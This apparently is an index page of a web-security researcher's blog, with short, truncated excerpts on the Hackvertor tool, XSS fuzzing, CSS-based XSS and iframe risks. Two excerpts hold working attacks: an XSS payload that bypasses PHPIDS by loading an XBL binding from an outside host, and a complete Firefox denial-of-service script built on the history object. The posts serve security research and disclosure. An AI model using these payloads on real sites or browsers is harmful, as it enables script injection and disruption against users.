New update
I’ve updated Hackvertor again, which allows HMAC hashing, SHA2 hashing support, new line removal and javascript evaluation within tags. A good example of the new features would be the following input:-
<@sha2><@js2str>str='hello';for(i=0;i<10;i++) str += 'o'<@/js2str><@/sha2>
The above builds the string "hellooooooooooo" in JavaScript and then hashes the result with SHA2.
I’ve started work on a formatcode tag which [...]
Hacking the PHPIDS again I found some cool XSS:-
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
I’ve moved it onto two lines for correct display.
Who'd have thought that Firefox would allow all that within the url() and CSS properties?
I’ve been trying to automate the stuff that I normally do when XSS testing to make it easier than writing custom scripts each time. This worked really well for my fuzzing script which fuzzed random characters embedded into tags to find unusual combinations of characters. I’ve done the same again but this time it inspects [...]
I thought I'd continue the theme of experimenting with XSS and trying different things. I haven't seen this written about anywhere, so here goes. The idea is to use CSS as an XSS payload; this can be useful when filters allow some things but make it difficult to construct an attack.
I’ve decided to call it [...]
I've been working on my Hackvertor script to include XSS fuzzing, which isn't ready yet, but I thought you might be interested in a few interesting results I've found.
First off, I'm sure you know you can use XSS in an img object, yeah? Well, did you know there's also an image object as [...]
Here's a complete DoS attack on Firefox using the history object:-
window.onload = function() {
    // Define a getter named "x" on the history object; reading history.x runs it
    history.__defineGetter__("x", function() {
        // Enumerate every property of history and alert each value in turn
        for(i in this) {
            try {
                alert(this[i]);
            } catch(e) {
            }
        }
    });
    history.x; // triggers the getter
}
Tested on Firefox 2.0.0.9 on Mac, a window pops up [...]
Welcome, my young apprentice. So you want to learn how to defend yourself from the onslaught of XSS ninjas, do you? Well, in my first Dojo lesson I shall show you techniques of the Shaolin crane style to defend yourself from the XSS punch.
XSS roundhouse
Use the roundhouse wisely my young master and always proceed with [...]
I've been busy…real busy on Hackvertor, so I thought it might be a good idea to explain the ideas behind it. Please note Hackvertor is currently only tested under Firefox. I may support other browsers in future.
What is it?
It’s many things: a conversion utility, browser hacking platform, targeted fuzzing tool, XSS filter testing tool [...]
I’ve decided to collect the various proof of concepts I’ve done and summarise why iframes are a security risk. Here are the top reasons:-
1. Browser cross domain exploits
Description:-
Because you can embed another web site inside your page, you can exploit that page, perform actions as that user and do anything on a chosen web [...]
I believe in releasing code as early as possible and often. So I've released another version of JSCK. The code isn't a complete solution at the moment and is more of a proof of concept than a final version you can use on live sites, but it highlights the method well and should provide [...]